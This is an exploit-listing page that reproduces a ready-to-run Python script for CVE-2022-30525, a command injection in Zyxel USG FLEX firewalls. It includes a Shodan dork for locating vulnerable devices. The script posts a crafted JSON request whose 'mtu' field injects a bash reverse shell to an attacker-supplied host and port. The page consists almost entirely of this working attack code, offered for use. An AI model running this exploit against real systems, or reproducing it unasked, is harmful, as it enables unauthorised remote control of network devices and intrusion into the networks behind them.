Exploit for Zyxel USG FLEX 5.21 Command Injection CVE-2022-30525

Name: Exploit for Zyxel USG FLEX 5.21 Command Injection CVE-2022-30525
Rating: 5 (163 reviews)
2022-06-03 | CVSS 10.0
## https://sploitus.com/exploit?id=PACKETSTORM:167372
# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection  
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"  
# Date: May 18th 2022  
# Exploit Author: Valentin Lobstein  
# Vendor Homepage: https://www.zyxel.com  
# Version: ZLD5.00 thru ZLD5.21  
# Tested on: Linux  
# CVE: CVE-2022-30525  
  
  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
import sys  
import json  
import base64  
import requests  
import argparse  
  
  
parser = argparse.ArgumentParser(  
prog="CVE-2022-30525.py",  
description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",  
)  
parser.add_argument("-u", dest="url", help="Specify target URL")  
parser.add_argument("-r", dest="host", help="Specify Remote host")  
parser.add_argument("-p", dest="port", help="Specify Remote port")  
  
args = parser.parse_args()  
  
banner = (  
"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"  
"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"  
"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"  
"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"  
"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"  
"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"  
"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"  
"biA6KSApCg=="  
)  
  
  
def main():  
  
print("\n" + base64.b64decode(banner).decode("utf-8"))  
  
if None in vars(args).values():  
print(f"[!] Please enter all parameters !")  
parser.print_help()  
sys.exit()  
  
if "http" not in args.url:  
args.url = "https://" + args.url  
args.url += "/ztp/cgi-bin/handler"  
exploit(args.url, args.host, args.port)  
  
  
def exploit(url, host, port):  
headers = {  
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",  
"Content-Type": "application/json",  
}  
  
data = {  
"command": "setWanPortSt",  
"proto": "dhcp",  
"port": "4",  
"vlan_tagged": "1",  
"vlanid": "5",  
"mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',  
"data": "hi",  
}  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")  
  
try:  
response = requests.post(  
url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5  
)  
except (KeyboardInterrupt, requests.exceptions.Timeout):  
print("[!] Bye Bye hekcer !")  
sys.exit(1)  
finally:  
  
try:  
print("[!] Can't exploit the target ! Code :", response.status_code)  
  
except:  
print("[!] Enjoy your shell !!!")  
  
  
if __name__ == "__main__":  
main()